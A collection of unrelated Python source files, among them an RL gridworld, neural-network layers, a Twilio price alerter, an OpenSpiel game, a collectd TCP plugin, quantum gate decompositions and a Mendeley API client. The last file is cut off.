self.member = None
def reset(self):
# self.wind_direction = random.choice([0, 1, 2, 3])
self.pos = self.start_pos
self.num_steps = 0
return np.array(self.pos)
def step(self, action, verbose=False):
# if action == 1:
# self.pos = self._get_new_pos(self.pos, self.wind_direction)
# self.wind_direction = random.choice([0, 1, 2, 3])
self.pos = self._get_new_pos(self.pos, action)
self.num_steps += 1
at_goal = self.pos == self.end_pos
done = at_goal or self.num_steps >= 200
if verbose:
print(f"step: {self.num_steps}, pos: {self.pos}")
return (np.array(self.pos),
1 * int(at_goal), done, {})
def _get_new_pos(self, pos, direction):
if direction == 0:
new_pos = (pos[0] - 1, pos[1])
elif direction == 1:
new_pos = (pos[0], pos[1] + 1)
elif direction == 2:
new_pos = (pos[0] + 1, pos[1])
elif direction == 3:
new_pos = (pos[0], pos[1] - 1)
if (new_pos[0] >= 0 and new_pos[0] < self.x_dim and new_pos[1] >= 0 and new_pos[1] < self.y_dim
and self.map[new_pos[0]][new_pos[1]] != "#"):
return new_pos
else:
return pos # did not move
def set_member(self, member):
self.member = member
def member_color(self):
if self.member == 0:
return [51, 255, 69]
elif self.member == 1:
return [255, 190, 51]
else:
raise ValueError
def _get_image(self, alpha=0.995):
frame_t = self.bg.copy()
frame_t[self.pos] = self.member_color()
# frame[self.end_pos] = [0, 0, 255]
# self.frame = (alpha * self.frame + (1 - alpha) * frame_t).astype(np.uint8)
self.frame[self.pos] = self.member_color()
return np.concatenate([frame_t, self.frame], axis=1)
def render(self, mode='human'):
img = self._get_image()
if mode == 'rgb_array':
return img
elif mode == 'human':
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(img)
return self.viewer.isopen
|
py | 1a37f9e4a6575882107c99b506ff31fa3f8d4411 | import numpy as np
def l2_regularization(W, reg_strength):
l2_reg_loss = reg_strength * np.sum(np.square(W))
grad = reg_strength * 2 * W
return l2_reg_loss, grad
def softmax(predictions):
copy_predictions = np.copy(predictions)
if predictions.ndim == 1:
copy_predictions -= np.max(copy_predictions)
calculated_exp = np.exp(copy_predictions)
copy_predictions = calculated_exp / np.sum(calculated_exp)
else:
copy_predictions -= np.amax(copy_predictions, axis=1, keepdims=True)
calculated_exp = np.exp(copy_predictions)
copy_predictions = calculated_exp / np.sum(calculated_exp, axis=1, keepdims=True)
return copy_predictions
def cross_entropy_loss(probs, target_index):
if probs.ndim == 1:
loss_func = -np.log(probs[target_index])
else:
batch_size = probs.shape[0]
every_batch_loss = -np.log(probs[range(batch_size), target_index])
loss_func = np.sum(every_batch_loss) / batch_size
return loss_func
def softmax_with_cross_entropy(preds, target_index):
d_preds = softmax(preds)
loss = cross_entropy_loss(d_preds, target_index)
if preds.ndim == 1:
d_preds[target_index] -= 1
else:
batch_size = preds.shape[0]
d_preds[range(batch_size), target_index] -= 1
d_preds /= batch_size
return loss, d_preds
class Param:
def __init__(self, value):
self.value = value
self.grad = np.zeros_like(value)
class ReLULayer:
def __init__(self):
pass
def forward(self, X):
self.X = X
return np.where(X >= 0, X, 0.0)
def backward(self, d_out: np.array) -> np.array:
d_result = np.where(self.X >= 0.0, 1.0, 0.0) * d_out
return d_result
def params(self):
return {}
class FullyConnectedLayer:
def __init__(self, n_input, n_output):
self.W = Param(0.001 * np.random.randn(n_input, n_output))
self.B = Param(0.001 * np.random.randn(1, n_output))
self.X = None
def forward(self, X):
self.X = X
return X @ self.W.value + self.B.value
def backward(self, d_out):
self.W.grad += self.X.T @ d_out
self.B.grad += np.sum(d_out, axis=0)
d_input = d_out @ self.W.value.T
return d_input
def params(self):
return {'W': self.W, 'B': self.B}
|
py | 1a37fa9aec6f5f6f45bb9815e1d240082de2f0bb | import logging
import os
import sys
import time
import click
from .investing import Investing
from .sendtext import SendText
__version__ = "0.0.4"
def setup_logging():
"""Create a basic console based logger object.
Args:
None
Returns:
logger (logging.logger): Logger object.
"""
log_handler = logging.StreamHandler()
log_handler.setFormatter(
logging.Formatter(
"%(asctime)s [%(levelname)5s] %(funcName)4s() - %(message)s",
"%Y-%m-%d %H:%M:%S",
)
)
logger = logging.getLogger(__name__)
logger.addHandler(log_handler)
logger.setLevel(logging.INFO)
return logger
def run(
instrument: Investing,
send_message: SendText,
lower: float,
upper: float,
threshold: float,
) -> tuple:
instrument.fetch()
logger.debug("Fetched page successfully.")
price = instrument.price()
logger.debug(f"Price of {instrument.name} is ${price}.")
if price >= upper or price <= lower:
logger.info(f"Price {price} breached price band [{lower}, {upper}].")
logger.debug(f"Resetting price band with threshold value {threshold}.")
upper = price * (1 + threshold / 10000)
lower = price * (1 - threshold / 10000)
logger.info(f"Resetting price band to [{lower}, {upper}].")
logger.debug("Sending text.")
send_message.send(f"{instrument.name} price is {price}.")
return (lower, upper)
@click.command(
context_settings=dict(help_option_names=["-h", "--help"]),
options_metavar="[options...]",
)
@click.argument("to_num", metavar="[to number]")
@click.argument("from_num", metavar="[from number]")
@click.argument("market", metavar="[market]")
@click.argument("contract", metavar="[contract]")
@click.argument("priceband", metavar="[priceband]")
@click.option("--symbol", "-s", help="Contract symbol. [default: contract]")
@click.option(
"--threshold", "-t", help="Threshold in bps.", default=100.0, show_default=True
)
@click.option(
"--interval",
"-i",
help="Interval to perform check (mins).",
default=1.0,
show_default=True,
)
@click.option(
"--sub-market", "-m", help="E.g. crypto is market and bitcoin is sub market."
)
@click.option("--debug", "-d", is_flag=True, help="Print debug messages.")
def main(
to_num,
from_num,
interval,
threshold,
debug=None,
symbol=None,
market=None,
contract=None,
priceband=None,
sub_market=None,
):
"""Utiltiy script to notify if instrument price fluctuates out of price band.
"""
global logger
logger = setup_logging()
if debug:
logger.setLevel(logging.DEBUG)
logger.debug("Logging set to debug.")
if ("TWILIO_AUTH_TOKEN" in os.environ) and ("TWILIO_ACCOUNT_SID" in os.environ):
pass
else:
logger.error("TWILIO_AUTH_TOKEN and/or TWILIO_ACCOUNT_SID not defined.")
sys.exit(1)
lower, upper = list(map(float, priceband.split("-")))
if sub_market:
end_point = market + "/" + sub_market + "/" + contract
else:
end_point = market + "/" + contract
logger.debug(f"{end_point} end point will be queried.")
instrument = Investing(end_point, symbol)
text_client = SendText(from_num, to_num)
while True:
try:
lower, upper = run(instrument, text_client, lower, upper, threshold)
time.sleep(60 * interval)
except KeyboardInterrupt:
logger.info("Caught interrupt, exiting...")
sys.exit()
if __name__ == "__main__":
main()
|
py | 1a37fa9b31da720437e88f04d34f335ee540eabd | #Given a list of numbers and a number k, return whether any two numbers from the list add up to k.
#For example, given [10, 15, 3, 7] and k of 17, return true since 10 + 7 is 17.
#Bonus: Can you do this in one pass?
if __name__ == "__main__":
l = list( int(i) for i in input().split(' '))
k = int(input())
found = False
for el in range(len(l)):
check = k - l[el]
if check in l:
found = Tru
print(found)
|
py | 1a37fbe533f4357c2dc72efc54fd947f1bff5cf2 | from __future__ import division #Make integer 3/2 give 1.5 in python 2.x
from CoolProp.CoolProp import PropsSI
from Correlations import Tsat
class PumpClass():
"""
Pump Model based on correlations obtained from experimental results
"""
def __init__(self,**kwargs):
#Load up the parameters passed in
# using the dictionary
self.__dict__.update(kwargs)
def Update(self,**kwargs):
#Update the parameters passed in
# using the dictionary
self.__dict__.update(kwargs)
def OutputList(self):
"""
Return a list of parameters for this component for further output
It is a list of tuples, and each tuple is formed of items with indices:
[0] Description of value
[1] Units of value
[2] The value itself
"""
return []
def Calculate(self):
#Local copies of coefficients
W=self.W
#Power
#Compute the pressure difference between the outlet and the inlet of the pump
self.DELTAP=self.pout_r-self.pin_r
#Get the rated power for all pressure differences
W_dot_rated=W[0]*self.DELTAP+W[1]
#Speed ratio
N_ratio=self.N/self.N_rated
#Get the estimation of the power
self.W_dot=(W[2]*N_ratio+W[3])*W_dot_rated
#Mass flow rate
#Define the slope of the line corresponding to the exhaust temperature as a linear interpolation of the minimum and maximum slope
slope=(self.slope_max-self.slope_min)/(self.p_max-self.p_min)*(self.pout_r-self.p_min)+self.slope_min
#Define the intercept of the line corresponding to the exhaust temperature
intercept=(self.intercept_max-self.intercept_min)/(self.p_max-self.p_min)*(self.pout_r-self.p_min)+self.intercept_min
self.m_dot=slope*self.N+intercept
#Outlet state
hin=PropsSI('H','T',self.Tin+273.15,'P',self.pin_r*1000,self.Ref)#*1000
self.s_in = PropsSI('S','T',self.Tin+273.15,'P',self.pin_r*1000,self.Ref)/1000
hout=hin+self.W_dot/self.m_dot
self.Tout=PropsSI('T','H',hout,'P',self.pout_r*1000,self.Ref) #in K
self.s_out=PropsSI('S','T',self.Tout,'P',self.pout_r*1000 + 100,self.Ref)/1000
self.Tout_s = PropsSI('T','S',self.s_in*1000,'P',self.pout_r*1000,self.Ref)
if __name__=='__main__':
"""
Example Diaphragm pump WANNER ENGINEERING
"""
pin_r_list=[794.7276887,780.158035,784.3067128,808.239602,822.8122092,826.29617,887.1980418]
pout_r_list=[1645.186859,1684.81582,1712.113611,1715.081928,1618.593683,1616.02753,1728.196266]
N_list=[1099.97098,1099.809986,1099.72049,1099.818785,1099.743137,1099.450796,1099.270196]
Tin_list=[15.4903837535014,15.3066340782123,15.5798263305322,15.7492877094972,15.5736862745098,15.7364804469274,15.0563305322129]
W_list_meas = [235.4954587,236.254973,245.3089328,241.3617462,233.9065263,228.6898989,239.6439083]
zip(pin_r_list,pout_r_list,N_list,Tin_list,W_list_meas)
for pin_r,pout_r,N,Tin,Wmeas in zip(pin_r_list,pout_r_list,N_list,Tin_list,W_list_meas):
kwds={
'W':[0.1096,114.34,1.0993,-0.0981],
'Ref':'R134a',
'pin_r':pin_r,
'pout_r':pout_r,
'N':N,
'N_rated':995,
'slope_min':0.000133504, #corresponding to the min outlet pressure
'slope_max':0.000114377, #corresponding to the max outlet pressure
'intercept_min':0.004, #corresponding to the min outlet pressure
'intercept_max':0.025, #corresponding to the max outlet pressure
'p_min':700.4260866,
'p_max':2659.623637,
'Tin':Tin
}
Pump=PumpClass(**kwds)
Pump.Calculate()
print 'Calculated:',Pump.W_dot,'W','Measured:',Wmeas,'W'
|
py | 1a37fc676e4940a2de137f66f48fdd937500d15e | # Copyright 2019 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as python3
"""Kuhn Poker implemented in Python.
This is a simple demonstration of implementing a game in Python, featuring
chance and imperfect information.
Python games are significantly slower than C++, but it may still be suitable
for prototyping or for small games.
It is possible to run C++ algorithms on Python implemented games, This is likely
to have good performance if the algorithm simply extracts a game tree and then
works with that. It is likely to be poor if the algorithm relies on processing
and updating states as it goes, e.g. MCTS.
"""
import enum
import numpy as np
import pyspiel
from open_spiel.python.games.tt_utils import *
_NUM_PLAYERS = 2
_NUM_ACTIONS = (len(TITAN_IDS) + NUM_TILES)*MAX_TITANS
_MAX_GAME_LENGTH = 48
# r1: (2 titans + 2 tiles) * 2 players
# r2: (1 titan + 3 tiles) * 2 players
# r3: (1 titan + 4 tiles) * 2 players
# r4: (1 titan + 5 tiles) * 2 players
# r5: (5 tiles) * 2 players
_GAME_TYPE = pyspiel.GameType(
short_name="tt",
long_name="Tiny Titans",
dynamics=pyspiel.GameType.Dynamics.SEQUENTIAL,
chance_mode=pyspiel.GameType.ChanceMode.DETERMINISTIC,
information=pyspiel.GameType.Information.IMPERFECT_INFORMATION,
utility=pyspiel.GameType.Utility.ZERO_SUM,
reward_model=pyspiel.GameType.RewardModel.TERMINAL,
max_num_players=_NUM_PLAYERS,
min_num_players=_NUM_PLAYERS,
provides_information_state_string=True,
provides_information_state_tensor=True,
provides_observation_string=True,
provides_observation_tensor=True,
provides_factored_observation_string=True)
_GAME_INFO = pyspiel.GameInfo(
num_distinct_actions=_NUM_ACTIONS,
max_chance_outcomes=0,
num_players=_NUM_PLAYERS,
min_utility=-1.03,
max_utility=1.03,
utility_sum=0.0,
max_game_length=_MAX_GAME_LENGTH)
class TTGame(pyspiel.Game):
"""A Python version of Tiny Titans."""
def __init__(self, params=None):
super().__init__(_GAME_TYPE, _GAME_INFO, params or dict())
def new_initial_state(self):
"""Returns a state corresponding to the start of a game."""
return TTState(self)
def make_py_observer(self, iig_obs_type=None, params=None):
"""Returns an object used for observing game state."""
return TTObserver(
iig_obs_type or pyspiel.IIGObservationType(perfect_recall=False),
params)
class TTState(pyspiel.State):
"""A python version of the tt state."""
def __init__(self, game):
"""Constructor; should only be called by Game.new_initial_state."""
super().__init__(game)
self.score = [0, 0]
self.titans = [[], []]
self.tiles = [[], []]
self.last_tiles = [[], []] # needed because we wipe placements on new rounds
self.round = 0 # represents the group of turns that leads into a battle
self.actions = []
self._next_player = 0
self._game_over = False
def _cur_max_titans(self):
return min(self.round+2, MAX_TITANS)
# OpenSpiel (PySpiel) API functions are below. This is the standard set that
# should be implemented by every sequential-move game with chance.
def current_player(self):
"""Returns id of the next player to move, or TERMINAL if game is over."""
if self._game_over:
return pyspiel.PlayerId.TERMINAL
else:
return self._next_player
def _legal_actions(self, player):
"""Returns a list of legal actions, sorted in ascending order."""
assert player >= 0
ret = []
my_titans = self.titans[player]
my_tiles = self.tiles[player]
used_titans = set(my_titans)
used_tiles = set(my_tiles)
if len(my_titans) < self._cur_max_titans():
base_index = len(my_titans)*len(TITAN_IDS)
for titan_index in range(len(TITAN_IDS)):
if titan_index not in used_titans:
ret.append((base_index+titan_index))
return ret
else: # tile index
base_index = MAX_TITANS*len(TITAN_IDS) + len(my_tiles)*NUM_TILES
for tile_index in range(NUM_TILES):
if tile_index not in used_tiles:
ret.append((base_index+tile_index))
return ret
def chance_outcomes(self):
"""Returns the possible chance outcomes and their probabilities."""
assert self.is_chance_node()
assert False, "not implemented"
return 0
# either apply next titan slot, or placement slot
def _parse_action(self, action):
next_titan = None
next_tile = None
my_titans = self.titans[self._next_player]
my_tiles = self.tiles[self._next_player]
base_tile_index = MAX_TITANS*len(TITAN_IDS)
if action < base_tile_index: # create titan
assert len(my_titans) < self._cur_max_titans()
titan_slot = action//len(TITAN_IDS)
assert titan_slot == len(my_titans)
next_titan = action % len(TITAN_IDS)
else: # set tile
assert len(my_tiles) < len(my_titans)
tile_slot = (action-base_tile_index)//NUM_TILES
assert tile_slot == len(my_tiles)
next_tile = (action-base_tile_index) % NUM_TILES
return next_titan, next_tile
def _apply_action(self, action):
"""Applies the specified action to the state."""
if self.is_chance_node():
assert False, "Not Implemented"
return
else:
self.actions.append(action)
my_titans = self.titans[self._next_player]
my_tiles = self.tiles[self._next_player]
next_titan, next_tile = self._parse_action(action)
if next_titan is not None:
my_titans.append(next_titan)
else:
my_tiles.append(next_tile)
# self round placement still incomplete
if len(my_titans) < self._cur_max_titans() or len(my_tiles) < len(my_titans):
return
# player 0 done, player 1 turn
if self._next_player == 0:
self._next_player = 1
return
# both done, play a game
is_p0_win = check_server_win(self.titans, self.tiles)
if is_p0_win:
self.score[0] += 1
else:
self.score[1] += 1
# if a round ended
if self.score[0] != 3 and self.score[1] != 3:
self.round += 1
self._next_player = 0
self.last_tiles = self.tiles
self.tiles = [[], []]
return
# if is complete
self._game_over = True
def _action_to_string(self, player, action):
"""Action -> string."""
# TODO: toname and totile functions
next_titan, next_tile = self._parse_action(action)
if next_titan is not None:
cmd = TITAN_ID_TO_NAME[TITAN_IDS[next_titan]]
else:
cmd = next_tile+1
return f"{player}({cmd})"
def is_terminal(self):
"""Returns True if the game is over."""
return self._game_over
def returns(self):
"""Total reward for each player over the course of the game so far."""
points_0 = self.score[0]//3 + self.score[0]*0.01
points_1 = self.score[1]//3 + self.score[1]*0.01
return [points_0-points_1, points_1-points_0]
def __str__(self):
"""String for debug purposes. No particular semantics are required."""
"""Observation of `state` from the PoV of `player`, as a string."""
pieces = []
pieces.append(f"round {self.round}")
pieces.append(f"score {self.score}")
for cur_player in range(2):
titans = self.titans[cur_player]
titans = [f"{TITAN_ID_TO_NAME[TITAN_IDS[tindex]]}({TITAN_IDS[tindex]})" for tindex in titans]
pieces.append(f"private titans p{cur_player} {titans}")
for cur_player in range(2):
pieces.append(f"private tiles p{cur_player} {self.tiles[cur_player]}")
return "\n".join(pieces)
class TTObserver:
"""Observer, conforming to the PyObserver interface (see observation.py)."""
def __init__(self, iig_obs_type, params):
"""Initializes an empty observation tensor."""
if params:
raise ValueError(f"Observation parameters not supported; passed {params}")
# Determine which observation pieces we want to include.
pieces = [("player", 2, (2,)), ("round", 1, (1,))]
if iig_obs_type.private_info == pyspiel.PrivateInfoType.SINGLE_PLAYER:
pieces.append(("private_titans", MAX_TITANS * len(TITAN_IDS), (MAX_TITANS, len(TITAN_IDS))))
pieces.append(("private_tiles", MAX_TITANS * NUM_TILES, (MAX_TITANS, NUM_TILES)))
if iig_obs_type.public_info:
if iig_obs_type.perfect_recall:
pieces.append(("actions", _MAX_GAME_LENGTH*_NUM_ACTIONS, (_MAX_GAME_LENGTH, _NUM_ACTIONS)))
else:
pieces.append(("score", 2, (2,)))
pieces.append(("public_titans", MAX_TITANS * len(TITAN_IDS) * 2, (MAX_TITANS, len(TITAN_IDS), 2)))
pieces.append(("public_tiles", MAX_TITANS * NUM_TILES * 2, (MAX_TITANS, NUM_TILES, 2)))
# Build the single flat tensor.
total_size = sum(size for name, size, shape in pieces)
self.tensor = np.zeros(total_size, np.float32)
# Build the named & reshaped views of the bits of the flat tensor.
self.dict = {}
index = 0
for name, size, shape in pieces:
self.dict[name] = self.tensor[index:index + size].reshape(shape)
index += size
def set_from(self, state: TTState, player):
"""Updates `tensor` and `dict` to reflect `state` from PoV of `player`."""
self.tensor.fill(0)
if "player" in self.dict:
self.dict["player"][player] = 1
if "round" in self.dict:
self.dict["round"][0] = state.round
if "score" in self.dict:
self.dict["score"][0] = state.score[0]
self.dict["score"][1] = state.score[1]
if "private_titans" in self.dict:
for i, titan in enumerate(state.titans[player]):
self.dict["private_titans"][i][titan] = 1
if "private_tiles" in self.dict:
for i, tile in enumerate(state.tiles[player]):
self.dict["private_tiles"][i][tile] = 1
if "public_titans" in self.dict:
for cur_player in range(2):
for i, titan in enumerate(state.titans[cur_player][:len(state.last_tiles[cur_player])]):
self.dict["public_titans"][i][titan][cur_player] = 1
if "public_tiles" in self.dict:
for cur_player in range(2):
for i, tile in enumerate(state.last_tiles[cur_player]):
self.dict["public_tiles"][i][tile][cur_player] = 1
if "actions" in self.dict:
for turn, action in enumerate(state.actions):
self.dict["actions"][turn, action] = 1
def string_from(self, state: TTState, player):
"""Observation of `state` from the PoV of `player`, as a string."""
pieces = []
if "player" in self.dict:
pieces.append(f"p{player}")
if "round" in self.dict:
pieces.append(f"round {state.round}")
if "score" in self.dict:
pieces.append(f"score {state.score}")
if "private_titans" in self.dict:
pieces.append(f"private titans {state.titans[player]}")
if "private_tiles" in self.dict:
pieces.append(f"private tiles {state.tiles[player]}")
if "public_titans" in self.dict:
for cur_player in range(2):
pieces.append(f"public titans p{cur_player} {state.titans[cur_player][:len(state.last_tiles[cur_player])]}")
if "public_tiles" in self.dict:
for cur_player in range(2):
pieces.append(f"private tiles p{cur_player} {state.last_tiles[cur_player]}")
if "actions" in self.dict:
pieces.append(f"action history {self.dict['actions']}")
return " ".join(str(p) for p in pieces)
# Register the game with the OpenSpiel library
pyspiel.register_game(_GAME_TYPE, TTGame)
|
py | 1a37fda96d7922a6cb5ccfd22b6c1bc33ee59152 | # Generated by Django 3.2.4 on 2021-07-26 11:38
import hashlib
from django.db import migrations
def update_entity_hash(apps, schema_editor):
# We can't import the Person model directly as it may be a newer
# version than this migration expects. We use the historical version.
Entity = apps.get_model('core', 'Entity')
for entity in Entity.objects.all():
if entity.hash:
continue
data = entity.name + entity.entity_type + entity.date_added.strftime('%Y%m%d')
hash = hashlib.md5(data.encode('utf-8')).hexdigest()
entity.hash = hash
entity.save()
class Migration(migrations.Migration):
dependencies = [
('core', '0175_lotv2_lots_v2_year_87d135_idx'),
]
operations = [
migrations.RunPython(update_entity_hash),
]
|
py | 1a37fdbe503027d522768544e89c291d7b4c834c | #!/usr/bin/env python
# -*- coding: utf-8; -*-
#
# collectd implementation of:
# https://github.com/BrightcoveOS/Diamond/blob/master/src/collectors/tcp/tcp.py
import collectd
import os
class Tcp(object):
PROC = ['/proc/net/netstat', '/proc/net/snmp']
GAUGES = ['CurrEstab', 'MaxConn']
def __init__(self):
self.plugin_name = "tcp"
self.allowed_metrics = []
def config(self, obj):
for node in obj.children:
if node.key == 'Metrics':
self.allowed_metrics = node.values
def log(self, t, message):
if t == 'err':
collectd.error('%s: %s' %(self.plugin_name, message))
elif t == 'warn':
collectd.warning('%s: %s' %(self.plugin_name, message))
elif t == 'verb':
collectd.info('%s: %s' %(self.plugin_name, message))
else:
collectd.info('%s: %s' %(self.plugin_name, message))
def submit(self, metric_name, value, type):
v = collectd.Values()
v.plugin = self.plugin_name
v.type = type
v.type_instance = metric_name
v.values = [int(value)]
v.dispatch()
def collect(self):
metrics = {}
for filepath in self.PROC:
if not os.access(filepath, os.R_OK):
self.log('error', 'Permission to access %s denied' %filepath)
continue
header = ''
data = ''
# Seek the file for the lines that start with Tcp
file = open(filepath)
if not file:
self.log('error', 'Failed to open %s' %filepath)
continue
while True:
line = file.readline()
# Reached EOF?
if len(line) == 0:
break
# Line has metrics?
if line.startswith("Tcp"):
header = line
data = file.readline()
break
file.close()
# No data from the file?
if header == '' or data == '':
self.log('error', '%s has no lines with Tcp' %filepath)
continue
header = header.split()
data = data.split()
for i in xrange(1, len(header)):
metrics[header[i]] = data[i]
#Send TCP stats to collectd
allowed_metrics = set(self.allowed_metrics).intersection(metrics.keys())
for metric_name in metrics:
if metric_name in allowed_metrics:
value = long(metrics[metric_name])
if metric_name in self.GAUGES:
self.submit(metric_name, value, 'gauge')
else:
self.submit(metric_name, value, 'counter')
tcp = Tcp()
collectd.register_read(tcp.collect)
collectd.register_config(tcp.config)
|
py | 1a37feb6af12c9c418ec6a3b79b4fc01be043b50 | # -*- coding: utf-8 -*-
"""Tests for thanks-related code."""
#
# (C) Pywikibot team, 2016-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
from pywikibot.flow import Topic
from tests.aspects import TestCase
from tests import unittest
NO_THANKABLE_POSTS = 'There is no recent post which can be test thanked.'
class TestThankFlowPost(TestCase):
"""Test thanks for Flow posts."""
family = 'test'
code = 'test'
write = True
@classmethod
def setUpClass(cls):
"""Set up class."""
super(TestThankFlowPost, cls).setUpClass()
cls._topic_title = 'Topic:Tvkityksg1ukyrrw'
def test_thank_post(self):
"""Test thanks for Flow posts."""
found_log = False
site = self.get_site()
topic = Topic(site, self._topic_title)
for post in reversed(topic.replies()):
user = post.creator
if site.user() == user.username:
continue
if user.is_thankable:
break
else:
self.skipTest(NO_THANKABLE_POSTS)
before_time = site.getcurrenttimestamp()
post.thank()
log_entries = site.logevents(logtype='thanks', total=5, page=user,
start=before_time, reverse=True)
try:
next(iter(log_entries))
except StopIteration:
found_log = False
else:
found_log = True
self.assertTrue(found_log)
def test_self_thank(self):
"""Test that thanking one's own Flow post causes an error."""
site = self.get_site()
topic = Topic(site, self._topic_title)
my_reply = topic.reply('My attempt to thank myself.')
self.assertAPIError('invalidrecipient', None, my_reply.thank)
if __name__ == '__main__': # pragma: no cover
try:
unittest.main()
except SystemExit:
pass
|
py | 1a37ff0458f9b95a840e18e223096e41f7e0e9bc | # -*- coding: utf-8 -*-
# Copyright 2018 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Module uses ideas from "Basic circuit compilation techniques
# for an ion-trap quantum machine" by Dmitri Maslov (2017) at
# https://iopscience.iop.org/article/10.1088/1367-2630/aa5e47
"""
Registers a decomposition to for a CNOT gate in terms of Rxx, Rx and Ry gates.
"""
import math
from projectq.cengines import DecompositionRule
from projectq.meta import get_control_count
from projectq.ops import Ph, Rxx, Ry, Rx, X
def _decompose_cnot2rxx_M(cmd): # pylint: disable=invalid-name
"""Decompose CNOT gate into Rxx gate."""
# Labelled 'M' for 'minus' because decomposition ends with a Ry(-pi/2)
ctrl = cmd.control_qubits
Ry(math.pi / 2) | ctrl[0]
Ph(7 * math.pi / 4) | ctrl[0]
Rx(-math.pi / 2) | ctrl[0]
Rx(-math.pi / 2) | cmd.qubits[0][0]
Rxx(math.pi / 2) | (ctrl[0], cmd.qubits[0][0])
Ry(-1 * math.pi / 2) | ctrl[0]
def _decompose_cnot2rxx_P(cmd): # pylint: disable=invalid-name
"""Decompose CNOT gate into Rxx gate."""
# Labelled 'P' for 'plus' because decomposition ends with a Ry(+pi/2)
ctrl = cmd.control_qubits
Ry(-math.pi / 2) | ctrl[0]
Ph(math.pi / 4) | ctrl[0]
Rx(-math.pi / 2) | ctrl[0]
Rx(math.pi / 2) | cmd.qubits[0][0]
Rxx(math.pi / 2) | (ctrl[0], cmd.qubits[0][0])
Ry(math.pi / 2) | ctrl[0]
def _recognize_cnot2(cmd):
"""Identify that the command is a CNOT gate (control - X gate)"""
return get_control_count(cmd) == 1
#: Decomposition rules
all_defined_decomposition_rules = [
DecompositionRule(X.__class__, _decompose_cnot2rxx_M, _recognize_cnot2),
DecompositionRule(X.__class__, _decompose_cnot2rxx_P, _recognize_cnot2),
]
|
py | 1a37ff3cb7ccbe5a460291eec3807ce1e677b28b | import os
import utils
def main():
src_file = os.path.join(os.getcwd(), "deploy/roles/default_role.yaml")
dst_file = os.path.join(os.getcwd(), "build/default_role.yaml")
with open(src_file, "r") as src:
with open(dst_file, "w+") as dst:
data = src.read()
print("Deploying {}".format(dst_file))
dst.write(data)
utils.apply(dst_file)
if __name__ == "__main__":
main()
|
py | 1a37ff3e1770ef5e5b5c0c44b1c7120857480268 | from mendeley.exception import MendeleyException
from mendeley.models.documents import *
from mendeley.resources.base import add_query_params, ListResource
from mendeley.resources.base_documents import DocumentsBase
class Documents(DocumentsBase):
"""
Top-level resource for accessing documents. These can be:
- documents for the logged-in user, if retrieved from a
:func:`MendeleySession <mendeley.session.MendeleySession.documents>`.
- documents in a :func:`Group <mendeley.models.groups.Group.documents>`.
"""
_url = '/documents'
def __init__(self, session, group_id):
super(Documents, self).__init__(session, group_id)
def get(self, id, view=None):
"""
Retrieves a document by ID.
:param id: the ID of the document to get.
:param view: the view to get. One of 'bib', 'client', 'tags', 'all'.
:return: a :class:`UserDocument <mendeley.models.documents.UserDocument>`.
"""
return super(Documents, self).get(id, view)
def list(self, page_size=None, view=None, sort=None, order=None, modified_since=None, deleted_since=None, marker=None, folder_id=None, tag=None, page=None):
"""
Retrieves documents, as a paginated collection.
:param page_size: the number of documents to return on each page. Defaults to 20.
:param view: the view to get. One of 'bib', 'client', 'tags', 'all'.
:param sort: if specified, sorts documents by the specified field. One of 'created', 'last_modified', 'title'.
:param order: if specified in conjunction with 'sort', specifies the sort order. One of 'asc', 'desc'.
:param modified_since: if specified, only returns files modified after this timestamp.
:param deleted_since: if specified, only returns the IDs of documents deleted after this timestamp.
:return: a :class:`Page <mendeley.pagination.Page>` of
:class:`UserDocuments <mendeley.models.documents.UserDocument>`.
"""
return super(Documents, self).list(page_size, view, sort, order, modified_since, deleted_since, marker, folder_id, tag, page)
def iter(self, page_size=None, view=None, sort=None, order=None, modified_since=None, deleted_since=None, folder_id=None, tag=None):
"""
Retrieves documents, as an iterator.
:param page_size: the number of documents to retrieve at a time. Defaults to 20.
:param view: the view to get. One of 'bib', 'client', 'tags', 'all'.
:param sort: if specified, sorts documents by the specified field. One of 'created', 'last_modified', 'title'.
:param order: if specified in conjunction with 'sort', specifies the sort order. One of 'asc', 'desc'.
:param modified_since: if specified, only returns files modified after this timestamp.
:param deleted_since: if specified, only returns the IDs of documents deleted after this timestamp.
:return: an iterator of :class:`UserDocuments <mendeley.models.documents.UserDocument>`.
"""
return super(Documents, self).iter(page_size, view, sort, order, modified_since, deleted_since, folder_id, tag)
def create(self, title, type, **kwargs):
"""
Creates a new document from metadata.
:param title: title of the document.
:param type: type of the document.
:param kwargs: other properties of the document. These can be any of the attributes on
:class:`UserDocument <mendeley.models.documents.UserDocument>` or any of its views.
:return: a :class:`UserDocument <mendeley.models.documents.UserDocument>`.
"""
kwargs['title'] = title
kwargs['type'] = type
kwargs['group_id'] = self.group_id
kwargs = format_args(kwargs)
content_type = UserDocument.content_type
rsp = self.session.post(self._url, data=json.dumps(kwargs), headers={
'Accept': content_type,
'Content-Type': content_type
})
return UserAllDocument(self.session, rsp.json())
def create_from_file(self, path):
"""
Creates a new document from a file.
:param path: path to the file.
:return: a :class:`UserDocument <mendeley.models.documents.UserDocument>`.
"""
filename = basename(path)
headers = {
'content-disposition': 'attachment; filename=%s' % filename,
'content-type': guess_type(filename)[0],
'accept': UserDocument.content_type
}
with open(path, 'rb') as f:
rsp = self.session.post('/documents', data=f, headers=headers)
return UserAllDocument(self.session, rsp.json())
def search(self, query, view=None, marker=None):
"""
Searches the logged-in user's library for documents.
:param query: the search query to execute.
:param view: the view to get. One of 'bib', 'client', 'tags', 'all'.
:return: a :class:`DocumentsSearch <mendeley.resources.documents.DocumentsSearch>` resource, from which results
can be retrieved.
"""
if self.group_id:
raise MendeleyException('Search is not available for group documents')
